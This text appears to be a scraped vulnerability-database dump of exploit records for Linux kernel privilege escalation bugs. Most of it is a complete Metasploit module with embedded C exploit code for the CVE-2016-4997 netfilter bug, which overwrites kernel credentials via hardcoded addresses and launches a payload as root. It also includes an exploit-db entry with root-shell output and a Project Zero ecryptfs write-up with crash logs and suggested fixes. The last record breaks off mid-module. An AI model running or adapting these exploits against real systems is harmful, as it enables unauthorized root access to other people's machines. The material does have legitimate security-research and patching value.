ip_tables\r\n # ip_tables 28672 1 iptable_filter, Live 0x0000000000000000\r\n # x_tables 36864 2 iptable_filter,ip_tables, Live 0x0000000000000000\r\n vprint_status('Checking if ip_tables is loaded in kernel')\r\n if target.name == \"Ubuntu\"\r\n iptables = cmd_exec('cat /proc/modules | grep ip_tables')\r\n if iptables.include?('ip_tables')\r\n vprint_good('ip_tables.ko is loaded')\r\n else\r\n print_error('ip_tables.ko is not loaded. root needs to run iptables -L or similar command')\r\n end\r\n return iptables.include?('ip_tables')\r\n elsif target.name == \"Fedora\"\r\n iptables = cmd_exec('cat /proc/modules | grep iptable_raw')\r\n if iptables.include?('iptable_raw')\r\n vprint_good('iptable_raw is loaded')\r\n else\r\n print_error('iptable_raw is not loaded. root needs to run iptables -L or similar command')\r\n end\r\n return iptables.include?('iptable_raw')\r\n else\r\n return false\r\n end\r\n end\r\n\r\n def shemsham_installed?()\r\n # we want this to be false.\r\n vprint_status('Checking if shem or sham are installed')\r\n shemsham = cmd_exec('cat /proc/cpuinfo')\r\n if shemsham.include?('shem')\r\n print_error('shem installed, system not vulnerable.')\r\n elsif shemsham.include?('sham')\r\n print_error('sham installed, system not vulnerable.')\r\n else\r\n vprint_good('shem and sham not present.')\r\n end\r\n return (shemsham.include?('shem') or shemsham.include?('sham'))\r\n end\r\n\r\n if iptables_loaded?() and not shemsham_installed?()\r\n return CheckCode::Appears\r\n else\r\n return CheckCode::Safe\r\n end\r\n end\r\n\r\n def exploit\r\n # first thing we need to do is determine our method of exploitation: compiling realtime, or droping a pre-compiled version.\r\n def has_prereqs?()\r\n vprint_status('Checking if 32bit C libraries, gcc-multilib, and gcc are installed')\r\n if target.name == \"Ubuntu\"\r\n lib = cmd_exec('dpkg --get-selections | grep libc6-dev-i386')\r\n if lib.include?('install')\r\n vprint_good('libc6-dev-i386 is installed')\r\n else\r\n print_error('libc6-dev-i386 is not installed. Compiling will fail.')\r\n end\r\n multilib = cmd_exec('dpkg --get-selections | grep ^gcc-multilib')\r\n if multilib.include?('install')\r\n vprint_good('gcc-multilib is installed')\r\n else\r\n print_error('gcc-multilib is not installed. Compiling will fail.')\r\n end\r\n gcc = cmd_exec('which gcc')\r\n if gcc.include?('gcc')\r\n vprint_good('gcc is installed')\r\n else\r\n print_error('gcc is not installed. Compiling will fail.')\r\n end\r\n return gcc.include?('gcc') && lib.include?('install') && multilib.include?('install')\r\n elsif target.name == \"Fedora\"\r\n lib = cmd_exec('dnf list installed | grep -E \\'(glibc-devel.i686|libgcc.i686)\\'')\r\n if lib.include?('glibc')\r\n vprint_good('glibc-devel.i686 is installed')\r\n else\r\n print_error('glibc-devel.i686 is not installed. Compiling will fail.')\r\n end\r\n if lib.include?('libgcc')\r\n vprint_good('libgcc.i686 is installed')\r\n else\r\n print_error('libgcc.i686 is not installed. Compiling will fail.')\r\n end\r\n multilib = false #not implemented\r\n gcc = false #not implemented\r\n return (lib.include?('glibc') && lib.include?('libgcc')) && gcc && multilib\r\n else\r\n return false\r\n end\r\n end\r\n\r\n compile = false\r\n if datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True'\r\n if has_prereqs?()\r\n compile = true\r\n vprint_status('Live compiling exploit on system')\r\n else\r\n vprint_status('Dropping pre-compiled exploit on system')\r\n end\r\n end\r\n if check != CheckCode::Appears\r\n fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')\r\n end\r\n\r\n desc_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8)\r\n env_ready_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8)\r\n pwn_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8)\r\n payload_file = rand_text_alpha(8)\r\n payload_path = \"#{datastore[\"WritableDir\"]}/#{payload_file}\"\r\n\r\n # direct copy of code from exploit-db, except removed the check for shem/sham and ip_tables.ko since we can do that in the check area here\r\n # removed #include <netinet/in.h> per busterb comment in PR 7326\r\n decr = %q{\r\n #define _GNU_SOURCE\r\n #include <stdio.h>\r\n #include <stdlib.h>\r\n #include <string.h>\r\n #include <unistd.h>\r\n #include <sched.h>\r\n #include <netinet/in.h>\r\n #include <linux/sched.h>\r\n #include <errno.h>\r\n #include <sys/types.h>\r\n #include <sys/socket.h>\r\n #include <sys/ptrace.h>\r\n #include <net/if.h>\r\n #include <linux/netfilter_ipv4/ip_tables.h>\r\n #include <linux/netlink.h>\r\n #include <fcntl.h>\r\n #include <sys/mman.h>\r\n\r\n #define MALLOC_SIZE 66*1024\r\n\r\n int decr(void *p) {\r\n int sock, optlen;\r\n int ret;\r\n void *data;\r\n struct ipt_replace *repl;\r\n struct ipt_entry *entry;\r\n struct xt_entry_match *ematch;\r\n struct xt_standard_target *target;\r\n unsigned i;\r\n\r\n sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW);\r\n\r\n if (sock == -1) {\r\n perror(\"socket\");\r\n return -1;\r\n }\r\n\r\n data = malloc(MALLOC_SIZE);\r\n\r\n if (data == NULL) {\r\n perror(\"malloc\");\r\n return -1;\r\n }\r\n\r\n memset(data, 0, MALLOC_SIZE);\r\n\r\n repl = (struct ipt_replace *) data;\r\n repl->num_entries = 1;\r\n repl->num_counters = 1;\r\n repl->size = sizeof(*repl) + sizeof(*target) + 0xffff;\r\n repl->valid_hooks = 0;\r\n\r\n entry = (struct ipt_entry *) (data + sizeof(struct ipt_replace));\r\n entry->target_offset = 74; // overwrite target_offset\r\n entry->next_offset = sizeof(*entry) + sizeof(*ematch) + sizeof(*target);\r\n\r\n ematch = (struct xt_entry_match *) (data + sizeof(struct ipt_replace) + sizeof(*entry));\r\n\r\n strcpy(ematch->u.user.name, \"icmp\");\r\n void *kmatch = (void*)mmap((void *)0x10000, 0x1000, 7, 0x32, 0, 0);\r\n uint64_t *me = (uint64_t *)(kmatch + 0x58);\r\n *me = 0xffffffff821de10d; // magic number!\r\n\r\n uint32_t *match = (uint32_t *)((char *)&ematch->u.kernel.match + 4);\r\n *match = (uint32_t)kmatch;\r\n\r\n ematch->u.match_size = (short)0xffff;\r\n\r\n target = (struct xt_standard_target *)(data + sizeof(struct ipt_replace) + 0xffff + 0x8);\r\n uint32_t *t = (uint32_t *)target;\r\n *t = (uint32_t)kmatch;\r\n\r\n printf(\"[!] Decrementing the refcount. This may take a while...\\n\");\r\n printf(\"[!] Wait for the \\\"Done\\\" message (even if you'll get the prompt back).\\n\");\r\n\r\n for (i = 0; i < 0xffffff/2+1; i++) {\r\n ret = setsockopt(sock, SOL_IP, IPT_SO_SET_REPLACE, (void *) data, 66*1024);\r\n }\r\n\r\n close(sock);\r\n free(data);\r\n printf(\"[+] Done! Now run ./pwn\\n\");\r\n\r\n return 0;\r\n }\r\n\r\n int main(void) {\r\n void *stack;\r\n int ret;\r\n\r\n printf(\"netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik\\n\");\r\n\r\n ret = unshare(CLONE_NEWUSER);\r\n\r\n if (ret == -1) {\r\n perror(\"unshare\");\r\n return -1;\r\n }\r\n\r\n stack = (void *) malloc(65536);\r\n\r\n if (stack == NULL) {\r\n perror(\"malloc\");\r\n return -1;\r\n }\r\n\r\n clone(decr, stack + 65536, CLONE_NEWNET, NULL);\r\n\r\n sleep(1);\r\n\r\n return 0;\r\n }\r\n }\r\n\r\n # direct copy of code from exploit-db\r\n pwn = %q{\r\n #include <stdio.h>\r\n #include <string.h>\r\n #include <errno.h>\r\n #include <unistd.h>\r\n #include <stdint.h>\r\n #include <fcntl.h>\r\n #include <sys/mman.h>\r\n #include <assert.h>\r\n\r\n #define MMAP_ADDR 0xff814e3000\r\n #define MMAP_OFFSET 0xb0\r\n\r\n typedef int __attribute__((regparm(3))) (*commit_creds_fn)(uint64_t cred);\r\n typedef uint64_t __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(uint64_t cred);\r\n\r\n void __attribute__((regparm(3))) privesc() {\r\n commit_creds_fn commit_creds = (void *)0xffffffff810a21c0;\r\n prepare_kernel_cred_fn prepare_kernel_cred = (void *)0xffffffff810a25b0;\r\n commit_creds(prepare_kernel_cred((uint64_t)NULL));\r\n }\r\n\r\n int main() {\r\n void *payload = (void*)mmap((void *)MMAP_ADDR, 0x400000, 7, 0x32, 0, 0);\r\n assert(payload == (void *)MMAP_ADDR);\r\n\r\n void *shellcode = (void *)(MMAP_ADDR + MMAP_OFFSET);\r\n\r\n memset(shellcode, 0, 0x300000);\r\n\r\n void *ret = memcpy(shellcode, &privesc, 0x300);\r\n assert(ret == shellcode);\r\n\r\n printf(\"[+] Escalating privs...\\n\");\r\n\r\n int fd = open(\"/dev/ptmx\", O_RDWR);\r\n close(fd);\r\n\r\n assert(!getuid());\r\n\r\n printf(\"[+] We've got root!\");\r\n\r\n return execl(\"/bin/bash\", \"-sh\", NULL);\r\n }\r\n }\r\n\r\n # the original code printed a line. However, this is hard to detect due to threading.\r\n # so instead we can write a file in /tmp to catch.\r\n decr.gsub!(/printf\\(\"\\[\\+\\] Done\\! Now run \\.\\/pwn\\\\n\"\\);/,\r\n \"int fd2 = open(\\\"#{env_ready_file}\\\", O_RDWR|O_CREAT, 0777);close(fd2);\" )\r\n\r\n # patch in to run our payload\r\n pwn.gsub!(/execl\\(\"\\/bin\\/bash\", \"-sh\", NULL\\);/,\r\n \"execl(\\\"#{payload_path}\\\", NULL);\")\r\n\r\n def pwn(payload_path, pwn_file, pwn, compile)\r\n # lets write our payload since everythings set for priv esc\r\n vprint_status(\"Writing payload to #{payload_path}\")\r\n write_file(payload_path, generate_payload_exe)\r\n cmd_exec(\"chmod 555 #{payload_path}\")\r\n register_file_for_cleanup(payload_path)\r\n\r\n # now lets drop part 2, and finish up.\r\n rm_f pwn_file\r\n if compile\r\n print_status \"Writing pwn executable to #{pwn_file}.c\"\r\n rm_f \"#{pwn_file}.c\"\r\n write_file(\"#{pwn_file}.c\", pwn)\r\n cmd_exec(\"gcc #{pwn_file}.c -O2 -o #{pwn_file}\")\r\n register_file_for_cleanup(\"#{pwn_file}.c\")\r\n else\r\n print_status \"Writing pwn executable to #{pwn_file}\"\r\n write_file(pwn_file, pwn)\r\n end\r\n register_file_for_cleanup(pwn_file)\r\n cmd_exec(\"chmod +x #{pwn_file}; #{pwn_file}\")\r\n end\r\n\r\n if not compile # we need to override with our pre-created binary\r\n # pwn file\r\n path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-pwn.out')\r\n fd = ::File.open( path, \"rb\")\r\n pwn = fd.read(fd.stat.size)\r\n fd.close\r\n # desc file\r\n path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-decr.out')\r\n fd = ::File.open( path, \"rb\")\r\n decr = fd.read(fd.stat.size)\r\n fd.close\r\n\r\n # overwrite the hardcoded variable names in the compiled versions\r\n env_ready_file = '/tmp/okDjTFSS'\r\n payload_path = '/tmp/2016_4997_payload'\r\n end\r\n\r\n # check for shortcut\r\n if datastore['REEXPLOIT']\r\n pwn(payload_path, pwn_file, pwn, compile)\r\n else\r\n rm_f desc_file\r\n if compile\r\n print_status \"Writing desc executable to #{desc_file}.c\"\r\n rm_f \"#{desc_file}.c\"\r\n write_file(\"#{desc_file}.c\", decr)\r\n register_file_for_cleanup(\"#{desc_file}.c\")\r\n output = cmd_exec(\"gcc #{desc_file}.c -m32 -O2 -o #{desc_file}\")\r\n else\r\n write_file(desc_file, decr)\r\n end\r\n rm_f env_ready_file\r\n register_file_for_cleanup(env_ready_file)\r\n #register_file_for_cleanup(desc_file)\r\n if not file_exist?(desc_file)\r\n vprint_error(\"gcc failure output: #{output}\")\r\n fail_with(Failure::Unknown, \"#{desc_file}.c failed to compile\")\r\n end\r\n if target.name == \"Ubuntu\"\r\n vprint_status \"Executing #{desc_file}, may take around 35s to finish. Watching for #{env_ready_file} to be created.\"\r\n elsif target.name == \"Fedora\"\r\n vprint_status \"Executing #{desc_file}, may take around 80s to finish. Watching for #{env_ready_file} to be created.\"\r\n end\r\n cmd_exec(\"chmod +x #{desc_file}; #{desc_file}\")\r\n sec_waited = 0\r\n\r\n until sec_waited > datastore['MAXWAIT'] do\r\n Rex.sleep(1)\r\n if sec_waited % 10 == 0\r\n vprint_status(\"Waited #{sec_waited}s so far\")\r\n end\r\n\r\n if file_exist?(env_ready_file)\r\n print_good(\"desc finished, env ready.\")\r\n pwn(payload_path, pwn_file, pwn, compile)\r\n return\r\n end\r\n sec_waited +=1\r\n end\r\n end\r\n end\r\nend", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/40435/"}, {"lastseen": "2016-10-10T21:29:24", "description": "Linux kernel 4.6.2 - IP6T_SO_SET_REPLACE Privilege Escalation. CVE-2016-4997. Local exploit for Lin_x86-64 platform", "published": "2016-10-10T00:00:00", "type": "exploitdb", "title": "Linux kernel 4.6.2 - IP6T_SO_SET_REPLACE Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-4997"], "modified": "2016-10-10T00:00:00", "id": "EDB-ID:40489", "href": "https://www.exploit-db.com/exploits/40489/", "sourceData": "# Exploit Title: Linux kernel <= 4.6.2 - Local Privileges Escalation via IP6T_SO_SET_REPLACE compat setsockopt call\r\n# Date: 2016.10.8\r\n# Exploit Author: Qian Zhang@MarvelTeam Qihoo 360\r\n# Version: Linux kernel <= 4.6.2\r\n# Tested on: Ubuntu 16.04.1 LTS Linux 4.4.0-21-generic\r\n# CVE: CVE-2016-4997\r\n# Reference:http://www.openwall.com/lists/oss-security/2016/09/29/10\r\n# Contact: tyrande000@gmail.com\r\n\r\n#DESCRIPTION\r\n#===========\r\n#The IPv6 netfilter subsystem in the Linux kernel through 4.6.2 does not validate certain offset fields,\r\n#which allows local users to escalade privileges via an IP6T_SO_SET_REPLACE compat setsockopt call with ip6_tables module loaded.\r\n\r\nzhang_q@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE$ ls\r\ncompile.sh enjoy enjoy.c pwn pwn.c version.h\r\nzhang_q@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE$ sudo modprobe ip6_tables\r\n[sudo] password for zhang_q: \r\nzhang_q@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE$ ./pwn \r\npwn begin, let the bullets fly . . .\r\nand wait for a minute . . .\r\npwn over, let's enjoy!\r\npreparing payload . . .\r\ntrigger modified tty_release . . .\r\ngot root, enjoy :)\r\nroot@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# \r\nroot@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# id\r\nuid=0(root) gid=0(root) groups=0(root)\r\nroot@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# hostnamectl \r\n Static hostname: ubuntu\r\n Icon name: computer-vm\r\n Chassis: vm\r\n Machine ID: 355cdf4ce8a048288640c2aa933c018f\r\n Virtualization: vmware\r\n Operating System: Ubuntu 16.04.1 LTS\r\n Kernel: Linux 4.4.0-21-generic\r\n Architecture: x86-64\r\nroot@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# \r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40489.zip", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/40489/"}], "zdt": [{"lastseen": "2018-03-19T05:21:05", "edition": 2, "description": "Exploit for linux platform in category local exploits", "published": "2016-06-21T00:00:00", "type": "zdt", "title": "Linux - ecryptfs and /proc/$pid/environ Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-1583"], "modified": "2016-06-21T00:00:00", "id": "1337DAY-ID-25603", "href": "https://0day.today/exploit/description/25603", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=836\r\n \r\nStacking filesystems, including ecryptfs, protect themselves against\r\ndeep nesting, which would lead to kernel stack overflow, by tracking\r\nthe recursion depth of filesystems. E.g. in ecryptfs, this is\r\nimplemented in ecryptfs_mount() as follows:\r\n \r\n s->s_stack_depth = path.dentry->d_sb->s_stack_depth + 1;\r\n \r\n rc = -EINVAL;\r\n if (s->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {\r\n pr_err(\"eCryptfs: maximum fs stacking depth exceeded\\n\");\r\n goto out_free;\r\n }\r\n \r\n \r\nThe files /proc/$pid/{mem,environ,cmdline}, when read, access the\r\nuserspace memory of the target process, involving, if necessary,\r\nnormal pagefault handling. If it was possible to mmap() them, an\r\nattacker could create a chain of e.g. /proc/$pid/environ mappings\r\nwhere process 1 has /proc/2/environ mapped into its environment area,\r\nprocess 2 has /proc/3/environ mapped into its environment area and so\r\non. A read from /proc/1/environ would invoke the pagefault handler for\r\nprocess 1, which would invoke the pagefault handler for process 2 and\r\nso on. This would, again, lead to kernel stack overflow.\r\n \r\n \r\nOne interesting fact about ecryptfs is that, because of the encryption\r\ninvolved, it doesn't just forward mmap to the lower file's mmap\r\noperation. Instead, it has its own page cache, maintained using the\r\nnormal filemap helpers, and performs its cryptographic operations when\r\ndirty pages need to be written out or when pages need to be faulted\r\nin. Therefore, not just its read and write handlers, but also its mmap\r\nhandler only uses the lower filesystem's read and write methods.\r\nThis means that using ecryptfs, you can mmap [decrypted views of]\r\nfiles that normally wouldn't be mappable.\r\n \r\nCombining these things, it is possible to trigger recursion with\r\narbitrary depth where:\r\n \r\na reading userspace memory access in process A (from userland or from\r\n copy_from_user())\r\ncauses a pagefault in an ecryptfs mapping in process A, which\r\ncauses a read from /proc/{B}/environ, which\r\ncauses a pagefault in an ecryptfs mapping in process B, which\r\ncauses a read from /proc/{C}/environ, which\r\ncauses a pagefault in an ecryptfs mapping in process C, and so on.\r\n \r\nOn systems with the /sbin/mount.ecryptfs_private helper installed\r\n(e.g. Ubuntu if the \"encrypt my home directory\" checkbox is ticked\r\nduring installation), this bug can be triggered by an unprivileged\r\nuser. The mount helper considers /proc/$pid, where $pid is the PID of\r\na process owned by the user, to be a valid mount source because the\r\ndirectory is \"owned\" by the user.\r\n \r\nI have attached both a generic crash PoC and a build-specific exploit\r\nthat can be used to gain root privileges from a normal user account on\r\nUbuntu 16.04 with kernel package linux-image-4.4.0-22-generic, version\r\n4.4.0-22.40, uname \"Linux user-VirtualBox 4.4.0-22-generic #40-Ubuntu\r\nSMP Thu May 12 22:03:46 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux\".\r\n \r\ndmesg output of the crasher:\r\n \r\n```\r\n[ 80.036069] BUG: unable to handle kernel paging request at fffffffe4b9145c0\r\n[ 80.040028] IP: [<ffffffff810c9a33>] cpuacct_charge+0x23/0x40\r\n[ 80.040028] PGD 1e0d067 PUD 0 \r\n[ 80.040028] Thread overran stack, or stack corrupted\r\n[ 80.040028] Oops: 0000 [#1] SMP \r\n[ 80.040028] Modules linked in: vboxsf drbg ansi_cprng xts gf128mul dm_crypt snd_intel8x0 snd_ac97_codec ac97_bus snd_pcm snd_seq_midi snd_seq_midi_event snd_rawmidi vboxvideo snd_seq ttm snd_seq_device drm_kms_helper snd_timer joydev drm snd fb_sys_fops soundcore syscopyarea sysfillrect sysimgblt vboxguest input_leds i2c_piix4 8250_fintek mac_hid serio_raw parport_pc ppdev lp parport autofs4 hid_generic usbhid hid psmouse ahci libahci e1000 pata_acpi fjes video\r\n[ 80.040028] CPU: 0 PID: 2135 Comm: crasher Not tainted 4.4.0-22-generic #40-Ubuntu\r\n[ 80.040028] Hardware name: innotek GmbH VirtualBox/VirtualBox, BIOS VirtualBox 12/01/2006\r\n[ 80.040028] task: ffff880035443200 ti: ffff8800d933c000 task.ti: ffff8800d933c000\r\n[ 80.040028] RIP: 0010:[<ffffffff810c9a33>] [<ffffffff810c9a33>] cpuacct_charge+0x23/0x40\r\n[ 80.040028] RSP: 0000:ffff88021fc03d70 EFLAGS: 00010046\r\n[ 80.040028] RAX: 000000000000dc68 RBX: ffff880035443260 RCX: ffffffffd933c068\r\n[ 80.040028] RDX: ffffffff81e50560 RSI: 000000000013877a RDI: ffff880035443200\r\n[ 80.040028] RBP: ffff88021fc03d70 R08: 0000000000000000 R09: 0000000000010000\r\n[ 80.040028] R10: 0000000000002d4e R11: 00000000000010ae R12: ffff8802137aa200\r\n[ 80.040028] R13: 000000000013877a R14: ffff880035443200 R15: ffff88021fc0ee68\r\n[ 80.040028] FS: 00007fbd9fadd700(0000) GS:ffff88021fc00000(0000) knlGS:0000000000000000\r\n[ 80.040028] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\r\n[ 80.040028] CR2: fffffffe4b9145c0 CR3: 0000000035415000 CR4: 00000000000006f0\r\n[ 80.040028] Stack:\r\n[ 80.040028] ffff88021fc03db0 ffffffff810b4b83 0000000000016d00 ffff88021fc16d00\r\n[ 80.040028] ffff880035443260 ffff8802137aa200 0000000000000000 ffff88021fc0ee68\r\n[ 80.040028] ffff88021fc03e30 ffffffff810bb414 ffff88021fc03dd0 ffff880035443200\r\n[ 80.040028] Call Trace:\r\n[ 80.040028] <IRQ> \r\n[ 80.040028] [<ffffffff810b4b83>] update_curr+0xe3/0x160\r\n[ 80.040028] [<ffffffff810bb414>] task_tick_fair+0x44/0x8e0\r\n[ 80.040028] [<ffffffff810b1267>] ? sched_clock_local+0x17/0x80\r\n[ 80.040028] [<ffffffff810b146f>] ? sched_clock_cpu+0x7f/0xa0\r\n[ 80.040028] [<ffffffff810ad35c>] scheduler_tick+0x5c/0xd0\r\n[ 80.040028] [<ffffffff810fe560>] ? tick_sched_handle.isra.14+0x60/0x60\r\n[ 80.040028] [<ffffffff810ee961>] update_process_times+0x51/0x60\r\n[ 80.040028] [<ffffffff810fe525>] tick_sched_handle.isra.14+0x25/0x60\r\n[ 80.040028] [<ffffffff810fe59d>] tick_sched_timer+0x3d/0x70\r\n[ 80.040028] [<ffffffff810ef282>] __hrtimer_run_queues+0x102/0x290\r\n[ 80.040028] [<ffffffff810efa48>] hrtimer_interrupt+0xa8/0x1a0\r\n[ 80.040028] [<ffffffff81052fa8>] local_apic_timer_interrupt+0x38/0x60\r\n[ 80.040028] [<ffffffff81827d9d>] smp_apic_timer_interrupt+0x3d/0x50\r\n[ 80.040028] [<ffffffff81826062>] apic_timer_interrupt+0x82/0x90\r\n[ 80.040028] <EOI> \r\n[ 80.040028] Code: 0f 1f 84 00 00 00 00 00 66 66 66 66 90 48 8b 47 08 48 8b 97 78 07 00 00 55 48 63 48 10 48 8b 52 60 48 89 e5 48 8b 82 b8 00 00 00 <48> 03 04 cd 80 42 f3 81 48 01 30 48 8b 52 48 48 85 d2 75 e5 5d \r\n[ 80.040028] RIP [<ffffffff810c9a33>] cpuacct_charge+0x23/0x40\r\n[ 80.040028] RSP <ffff88021fc03d70>\r\n[ 80.040028] CR2: fffffffe4b9145c0\r\n[ 80.040028] fbcon_switch: detected unhandled fb_set_par error, error code -16\r\n[ 80.040028] fbcon_switch: detected unhandled fb_set_par error, error code -16\r\n[ 80.040028] ---[ end trace 616e3de50958c35b ]---\r\n[ 80.040028] Kernel panic - not syncing: Fatal exception in interrupt\r\n[ 80.040028] Shutting down cpus with NMI\r\n[ 80.040028] Kernel Offset: disabled\r\n[ 80.040028] ---[ end Kernel panic - not syncing: Fatal exception in interrupt\r\n```\r\n \r\nexample run of the exploit, in a VM with 4 cores, with Ubuntu 16.04 installed:\r\n \r\n```\r\n[email\u00a0protected]:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ls\r\ncompile.sh exploit.c hello.c suidhelper.c\r\n[email\u00a0protected]:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ./compile.sh \r\n[email\u00a0protected]:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ls\r\ncompile.sh exploit exploit.c hello hello.c suidhelper suidhelper.c\r\n[email\u00a0protected]:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ./exploit\r\nall spammers ready\r\nrecurser parent ready\r\nspam over\r\nfault chain set up, faulting now\r\nwriting stackframes\r\nstackframes written\r\nkilling 2494\r\npost-corruption code is alive!\r\nchildren should be dead\r\ncoredump handler set. recurser exiting.\r\ngoing to crash now\r\nsuid file detected, launching rootshell...\r\nwe have root privs now...\r\n[email\u00a0protected]:/proc# id\r\nuid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)\r\n```\r\n \r\n(If the exploit crashes even with the right kernel version, try\r\nrestarting the machine. Also, ensure that no program like top/htop/...\r\nis running that might try to read process command lines. Note that\r\nthe PoC and the exploit don't really clean up after themselves and\r\nleave mountpoints behind that prevent them from re-running without\r\na reboot or manual unmounting.)\r\n \r\nNote that Ubuntu compiled their kernel with\r\nCONFIG_SCHED_STACK_END_CHECK turned on, making it harder than it used\r\nto be in the past to not crash the kernel while exploiting this bug,\r\nand an overwrite of addr_limit would be useless because at the\r\ntime the thread_info is overwritten, there are multiple instances of\r\nkernel_read() on the stack. Still, the bug is exploitable by carefully\r\naligning the stack so that the vital components of thread_info are\r\npreserved, stopping with an out-of-bounds stack pointer and\r\noverwriting the thread stack using a normal write to an adjacent\r\nallocation of the buddy allocator.\r\n \r\nRegarding the fix, I think the following would be reasonable:\r\n \r\n - Explicitly forbid stacking anything on top of procfs by setting its\r\n s_stack_depth to a sufficiently large value. In my opinion, there\r\n is too much magic going on inside procfs to allow stacking things\r\n on top of it, and there isn't any good reason to do it. (For\r\n example, ecryptfs invokes open handlers from a kernel thread\r\n instead of normal user process context, so the access checks inside\r\n VFS open handlers are probably ineffective - and procfs relies\r\n heavily on those.)\r\n \r\n - Forbid opening files with f_op->mmap==NULL through ecryptfs. If the\r\n lower filesystem doesn't expect to be called in pagefault-handling\r\n context, it probably shouldn't be called in that context.\r\n \r\n - Create a dedicated kernel stack cache outside of the direct mapping\r\n of physical memory that has a guard page (or a multi-page gap) at\r\n the bottom of each stack, and move the struct thread_info to a\r\n different place (if nothing else works, the top of the stack, above\r\n the pt_regs).\r\n While e.g. race conditions are more common than stack overflows in\r\n the Linux kernel, the whole vulnerability class of stack overflows\r\n is easy to mitigate, and the kernel is sufficiently complicated for\r\n unbounded recursion to emerge in unexpected places - or perhaps\r\n even for someone to discover a way to create a stack with a bounded\r\n length that is still too high. Therefore, I believe that guard\r\n pages are a useful mitigation.\r\n Nearly everywhere, stack overflows are caught using guard pages\r\n nowadays; this includes Linux userland, but also {### TODO ###}\r\n and, on 64-bit systems, grsecurity (using GRKERNSEC_KSTACKOVERFLOW).\r\n \r\nOh, and by the way: The `BUG_ON(task_stack_end_corrupted(prev))`\r\nin schedule_debug() ought to be a direct panic instead of an oops. At\r\nthe moment, when you hit it, you get a recursion between the scheduler\r\ninvocation in do_exit() and the BUG_ON in the scheduler, and the\r\nkernel recurses down the stack until it hits something sufficiently\r\nimportant to cause a panic.\r\n \r\nI'm going to send (compile-tested) patches for my first two fix\r\nsuggestions and the recursive oops bug. I haven't written a patch for\r\nthe guard pages mitigation - I'm not familiar enough with the x86\r\nsubsystem for that.\r\n \r\n \r\nNotes regarding the exploit:\r\n \r\nIt makes an invalid assumption that causes it to require at least around 6GB of RAM.\r\n \r\nIt has a trivially avoidable race that causes it to fail on single-core systems after overwriting the coredump handler; if this happens, it's still possible to manually trigger a coredump and execute the suid helper to get a root shell.\r\n \r\nThe page spraying is pretty primitive and racy; while it works reliably for me, there might be influencing factors that cause it to fail on other people's machines.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39992.zip\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/25603"}, {"lastseen": "2018-04-11T21:58:13", "description": "This Metasploit module attempts to exploit a netfilter bug on Linux Kernels befoe 4.6.3, and currently only works against Ubuntu 16.04 (not 16.04.1) with kernel 4.4.0-21-generic. Several conditions have to be met for successful exploitation: Ubuntu: 1. ip_tables.ko (ubuntu), iptable_raw (fedora) has to be loaded (root running iptables -L will do such) 2. libc6-dev-i386 (ubuntu), glibc-devel.i686", "edition": 2, "published": "2016-09-27T00:00:00", "type": "zdt", "title": "Linux Kernel 4.6.3 Netfilter Privilege Escalation Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-4997"], "modified": "2016-09-27T00:00:00", "id": "1337DAY-ID-24860", "href": "https://0day.today/exploit/description/24860", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire \"msf/core\"\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = GoodRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Linux Kernel 4.6.3 Netfilter Privilege Escalation',\r\n 'Description' => %q{\r\n This module attempts to exploit a netfilter bug on Linux Kernels befoe 4.6.3, and currently\r\n only works against Ubuntu 16.04 (not 16.04.1) with kernel\r\n 4.4.0-21-generic.\r\n Several conditions have to be met for successful exploitation:\r\n Ubuntu:\r\n 1. ip_tables.ko (ubuntu), iptable_raw (fedora) has to be loaded (root running iptables -L will do such)\r\n 2. libc6-dev-i386 (ubuntu), glibc-devel.i686 & libgcc.i686 (fedora) needs to be installed to compile\r\n Kernel 4.4.0-31-generic and newer are not vulnerable.\r\n\r\n We write the ascii files and compile on target instead of locally 